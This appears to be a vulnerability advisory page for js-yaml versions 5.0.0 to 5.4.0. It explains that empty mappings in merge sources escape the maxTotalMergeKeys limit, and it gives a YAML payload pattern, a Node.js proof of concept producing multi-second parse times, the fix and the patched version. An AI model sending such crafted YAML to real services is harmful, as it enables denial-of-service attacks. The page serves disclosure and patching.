GHSA-r3ph-w7gj-g6xmMedium· 5.3▾ Sunlitjs-yaml: maxTotalMergeKeys does not limit CPU use for empty merge sources
▾ Sunlit zone — Low / medium · no exploitation signal
impact 29.2 · likelihood 0 · exploitation 0
Need a working PoC? Pro members can cast a request and our team develops one — it lands right here.
maxTotalMergeKeys does not count empty mappings. An attacker can repeatedly merge a large sequence of them and consume significant CPU without reaching the configured limit.
arr: &arr [{}, {}, {}, ...] # N empty mappings
targets:
- <<: *arr # repeated K times
For every target, the loader iterates all N elements of arr. This results in O(N * K) work while totalMergeKeys remains unchanged.
import { performance } from 'node:perf_hooks'
import { load, YAML11_SCHEMA } from 'js-yaml'
const n = 20000
const src =
'arr: &arr [' + '{},'.repeat(n).slice(0, -1) + ']\n' +
'targets:\n' +
' - <<: *arr\n'.repeat(n)
const started = performance.now()
load(src, { schema: YAML11_SCHEMA })
console.log(`${(performance.now() - started).toFixed(1)} ms`)
Observed results:
| N | YAML size | Time |
|---|---|---|
| 800 | ~13 KB | ~20 ms |
| 3200 | ~50 KB | ~180 ms |
| 20000 | ~500 KB | ~13 s |
When merge keys are enabled, an attacker can submit a relatively small YAML document that causes prolonged CPU consumption despite the default maxTotalMergeKeys limit.
Count every merge source mapping as one budget unit in addition to counting its keys.
js-yaml >= 5.0.0, <= 5.4.0Upgrade to a patched release:
js-yaml 5.4.1Connected by shared product, vendor, weakness, or advisory.
CVE-2026-84375High· 7.5js-yaml is a JavaScript YAML parser and dumper
GHSA-5p4m-2wfm-xmqjHigh· 7.5JS-YAML: Quadratic CPU consumption in !!omap resolution (3.x and 4.x) — CVE-2026-59870 fix not backported
GHSA-pm4m-ph32-ghv5High· 7.5js-yaml: Exponential parsing time in flow collections leads to denial of service
CVE-2026-59870Medium· 5.3js-yaml: Quadratic-complexity (O(n^2)) DoS via !!omap tag in YAML11_SCHEMA
CVE-2026-59869High· 7.5js-yaml is a JavaScript YAML parser and dumper
CVE-2026-59868Medium· 5.3js-yaml is a JavaScript YAML parser and dumper